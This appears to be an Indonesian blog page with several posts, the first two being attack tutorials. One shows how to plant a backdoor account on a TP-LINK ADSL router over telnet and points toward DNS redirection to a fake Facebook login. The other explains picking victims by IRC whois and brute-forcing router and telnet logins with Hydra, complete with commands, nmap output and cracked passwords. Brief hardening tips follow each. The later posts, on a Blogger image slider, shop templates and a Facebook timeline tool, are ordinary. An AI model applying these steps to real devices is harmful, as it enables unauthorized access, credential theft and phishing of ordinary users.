Membuat backdoor account pada router modem ADSL

Backdoor account router modem ADSL adalah pintu belakang untuk masuk ke router modem dengan menggunakan account yang lain pada router modem ADSL.
Untuk membuat account maka anda harus mengetahui password admin, untuk mengetahui password admin dapat menggunakan berbagai cara, contohnya http://infoanakmudamasakini.blogspot.com/#####@.
Disini kasus kita adalah router modem TP-LINK dan diasumsikan anda sudah mengetahui passwordnya, atau lebih beruntung lagi jika misal masih default setting passwordnya, passwordnya adalah admin juga sama dengan usernamenya hhi.


Masukkan perintah telnet 192.168.1.1


Ikuti perintah dibawah ini
1. Masukkan password modem router.
2. Untuk mengetahui Router modemnya pada mode multiuser atau tidak, maka masukkan perintah : sys multiuser
Jika tampil outputnya adalah Multi-user mode: 0 maka tidak ada account lain selain username admin, jika output Multi-user mode: 1 maka disitu ada account lain.
Untuk membuat account lain alias backdoor account maka masukkan perintah :
sys multiuser (username) (password)
Jika muncul outputnya adalah Multi-user mode: 1 seperti pada gambar maka account baru sudah ditambahkan.


Jika sudah tinggal login saja dengan menggunakan account backdoor yang sudah dibuat.


Tampilan router modem yang siap untuk di edit. Misal jika ingin melakukan serangan pada DNS untuk mengarahkan halaman web ke fake login seperti facebook dapat masuk ke http://infoanakmudamasakini.blogspot.com/#####. PoC untuk remote juga dimungkinkan misal untuk exploitasi celah browser dan sebagainya.
Bagi pengguna speedy, pastikan modem anda tidak ada account lain yang dibuat oleh orang lain yang tidak anda ketahui atau tidak bertanggung jawab dengan cara masuk ke telnet router modem ketikkan sys multiuser, jika outputnya Multi-user mode: 1, maka matikan saja multiusernya dengan cara sys multiuser off.  Serangan-serangan untuk exploitasi korban bukan hanya karena ada niat tapi juga karena ada kesempatan.
Oleh : R3zp3ct0r23

Read More

Hacking password Router via internet dengan Hydra hingga mendapatkan shell di server yang berada dibelakang router

Apakah anda suka cari target di IRC untuk dihack router speedy atau di PC dibelakang router untuk pentest? Apakah anda masih mengandalkan target yang mengandalkan router speedy dengan keamanan password default yaitu user admin dan password admin ? Kalau anda masih mengandalkan metode serangan password default, maka disini penulis akan memberikan metode tambahan untuk anda yaitu metode brute force.
Disini penulis menggunakan tool Hydra. Hydra adalah tool untuk melakukan hacking password dengan menggunakan metode brute force, dengan anda memiliki kamus kata yang banyak yang dimungkinkan passwordnya ada di dalam kamus tersebut.
Di sini penulis contohkan misal kita join ke mIRC, kita contohkan saja nick ce_imutbgtt, nah whois aja itu nick dan kita akan mendapatkan IPnya.

Tampilan IP setelah di whois.

Setelah kita dapatkan IPnya maka jalankan saja di browser IP address tersebut.

Setelah dijalankan http://180.254.70.135 maka akan tampil form window seperti dibawah ini

Jika menggunakan username admin dan password admin hasilnya adalah gagal maka anda akan dihadapkan pada 2 hal, terus maju atau tinggalkan target.
Jika anda ingin terus maju maka anda dapat menggunakan teknik brute force. Contohnya untuk melakukan exploitasi dengan hydra adalah
H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host: 180.254.70.135   login: admin   password: baseball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57
H:\hydra>
Setelah kita masuk ke router dengan password yang didapat, jika kita ingin melakukan hacking server di belakang router maka kita dapat melakukan IP Forwarding dari router ke Server yang berada dibelakang router.

Disini kita tidak tahu IP-IP lokal berapa saja dibelakang router, karena itu kita dapat mengujinya satu persatu dengan melakukan ping walaupun tidak jaminan.
Disini diasumsikan IP Servernya adalah 192.168.1.2 setelah kita ping dapat.
D:\>ping 180.254.70.135
Pinging 180.254.70.135 with 32 bytes of data:
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Reply from 180.254.70.135: bytes=32 time=2ms TTL=254
Reply from 180.254.70.135: bytes=32 time=11ms TTL=254
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Setelah diping jalan maka kita dapat mencoba melakukan scanning dengan NMAP
C:\>nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:28
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)
Disini dari scanning dengan NMAP kita mendapatkan adanya port 23 yaitu port untuk telnet server. Dengan aktifnya Telnet Server maka kita dapat melakukan brute force ke server Telnet dengan Hydra.
H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host: 180.254.70.135   login: administrator   password: sepakbola
Hydra (http://www.thc.org) finished at 2011-10-17 15:21:26
Binggo, kita mendapatkan password telnetnya.
Masukkan login dan passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :

Setelah kita klik Open. Masukkan login dan passwordnya.

Binggo, kita masuk ke shell server.
Untuk download Hydra. http://0xa.li/files/hydra-6.0-windows.zip. Untuk cari kamusnya untuk brute force dapat dicari sendiri di google, jika ingin buat sendiri juga boleh. Cayooo!
Pengamanannya jika anda ingin tetap dapat dipanggil router speedynya dari luar, maka anda dapat membuat password yang susah ditebak dengan berbagai kombinasi huruf dan angka yang kompleks tapi tetap mudah diingat. Jika ingin lebih aman lagi ya tidak perlu membuat router speedy bisa diakses dari internet, caranya misal dengan melempar port 80 ke IP lain yang kosong atau tidak dipakai.
Saya tidak bertanggung sama sekali atas semua hal-hal yang diakibatkan oleh artikel ini.

Oleh : R3zp3ct23

Read More

Cara Mudah Membuat Gambar Slide Pada Blog

Untuk membuat Gambar Auto Slider/ Gambar bergerak otomatis pada blog carannya sangat mudah dan nggak butuh waktu lama untuk mengerjakannya.

Nih langsung saja praktik Masbroo

1.  Login dengan akun blogger anda.
2.  Pilih Rancangan
3.  Pilih Edit HTML
4. Cari kode ]]></b:skin> lalu copas kode CSS berikut tepat diatasnya.

/* CSS easySlider */ #containerSlider { width:175px; height:120px; margin:0 0px; padding:0; position:relative; } #prevBtn, #nextBtn { display:block; margin:0; overflow:hidden; padding:0; text-indent:-8000px; } #slider ul, #slider li { list-style:none; margin:0; padding:0; text-indent:0; } #slider, #slider li { overflow:hidden; width:175px; height:120px; margin:0 auto; } #slider { margin-left:0; background:#ccc; border:1px solid #999; } #prevBtn, #nextBtn { display:block; height:34px; left:-20px; position:absolute; top:38px; width:31px; } #nextBtn { left:200px; } #prevBtn a, #nextBtn a { background:transparent url() no-repeat scroll 0 0; display:block; height:34px; width:31px; } #nextBtn a { background:transparent url() no-repeat scroll 0 0; } #slider img { background:#ccc; padding:0px; width:175px; height:120px; }

    *Perhatikan untuk teks yang berwarna merah dapat anda ganti ukurannya 

      sesuai kebutuhan anda

5. Kemudian cari kode </head> lalu copas kode berikut tepat diatasnya.

<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js' type='text/javascript'/>
<script src='http://pelajarandashblogdotblogspotdotcom.googlecode.com/files/easySlider1.5.js' type='text/javascript'/>
<script type='text/javascript'>
$(document).ready(function(){
$(&quot;#slider&quot;).easySlider({
auto: true,
continuous: true
});
});
</script>

6. Klik SAVE



7. Selanjutnya buatlah widget baru dengan cara klik Page Element lalu Add Widget baru dan
    pilih HTML/Javascript dan masukkan  kode berikut:

<div id="contentSlider">
<div id="slider">
<ul>
<li><a href="#" target=_blank"><img alt="1" src="url gambar 1" /></a></li>
<li><a href="#" target=_blank"><img alt="1" src="url gambar 2" /></a></li>
<li><a href="#" target=_blank"><img alt="1" src="url gambar 3" /></a></li>
<li><a href="#" target=_blank"><img alt="1" src="url gambar 4" /></a></li>
<li><a href="#" target=_blank"><img alt="1" src="url gambar 5 dst" /></a></li>
</ul>
</div>
</div>

8. Untuk Url dapat ditambah sesuai keinginan.
    Selesai..

Read More

Clasik Template Style

Dengan memberikan fitur yang sederhana, terkadang kita justru malah suka dengan toko online yang simple, mudah dan gampang transaksinya kepada customer. Untuk itu, hal ini bisa kita jadikan alternatif untuk menggunakan template khusus toko online bagi sahabat blogger yang ingin berjualan online.

Walaupun sudah banyak CMS yang dirancang khusus untuk toko online, seperti prestashop, opencart, osCommerce serta sejenisnya, namun pada akhirnya banyak juga yang tertarik dengan menggunakan blog untuk jualan di internet.

Bagi para blogger lover, katanya membuat toko online di internet dengan template blogspot itu menunjukkan bahwa toko online kita kurang keren dan gak serius? Wah sebetulnya ini salah besar,  sebab sudah banyak kok template blogger yang dirancang dengan modifikasi sedemikian rupa sehingga bisa dijadikan toko online blogspot professional dan pokoknya tergantung gimana kita nanti mengelolanya.

Nah, berikut ini kumpulan template blogspot khusus untuk toko online yang dipersembahkan olen Pandaan Media Corner:

COMING SOON: TEMPLATE Pilihan Info Anak Muda Masa Kini Terupdate

 

VISIT DEMO OF THIS TEMPLATE

TEMPLATE STATUS: BETA

1. Blogger Store

 

DOWNLOAD 

2. Blogger Store V2

DOWNLOAD

3. Simplex Eshop

DOWNLOAD

4.Simple Cart New

DOWNLOAD 

5. Picture Line

DOWNLOAD 

6. Perfume Online Shop

 DOWNLOAD 

7. My Guitar

DOWNLOAD
 

 8. Flower Shop

DOWNLOAD 

 9. DelliStore

 DOWNLOAD 
 

 10. T Shirt

DOWNLOAD 
 

 11. Galleria

DOWNLOAD

12.Baby Online Store

DOWNLOAD

Read More

Menon aktifkan Fitur Timeline Facebook

Para facebooker sudah pastinya tahu bahwa sekarang facebook menghadirkan fitur baru yaitu menggunakan timeline. Namun jangan seneng dulu bahwa ada juga lo diantara teman teman FB yang justru lebih nyaman dan seneng dengan fitur klasik FB tanpa timeline. Nah dengan aplikasi berikut mungkin akan menjadi alternatif bagi para facebooker untuk menggunakan fitur klasik tanpa timline buat profil facebook mereka. Nama dari aplikasi ini adalah Timeline Remover yang memiliki fungsi men-disable fitur timeline pada profil facebook dan me-restore tampilan klasik pada profil facebook anda.

Kelebihan dari tool ini adalah adalah dapat bekerja secara otomatis sejak diinstal. Nanti setelah diinstal maka secara otomatis toolbar dimasukkan dalam browser kita sehingga kita bisa memilih untuk menggunakan fitur timeline apa tidak pada profil FB kita.

Pada toolbar tampak tanda (X) berwarna merah yang menandakan bahwa fitur timeline masih aktif, sedangkan bila dipilih tanda checklist hijau maka nanti fitur timeline dinonaktifkan.

Bila kamu tertarik menggunakannya maka kamu dapat menginstal tool tersebut di browser kamu.

Instal sesuai dengan browser yang kamu gunakan

Read More